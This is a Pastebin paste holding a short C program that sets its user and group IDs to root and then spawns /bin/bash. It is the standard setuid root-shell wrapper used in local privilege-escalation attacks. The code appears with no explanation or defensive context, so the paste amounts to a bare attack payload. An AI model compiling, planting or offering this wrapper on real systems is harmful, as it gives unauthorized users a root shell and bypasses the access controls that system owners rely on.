Advertisement
ardann

Untitled

Dec 6th, 2018
168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.14 KB | None | 0 0
  1. #include <stdio.h>
  2. #include <sys/types.h>
  3. #include <unistd.h>
  4. int main()
  5. {
  6. setuid(0);
  7. setgid(0);
  8. system("/bin/bash");
  9. return 0;
  10. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement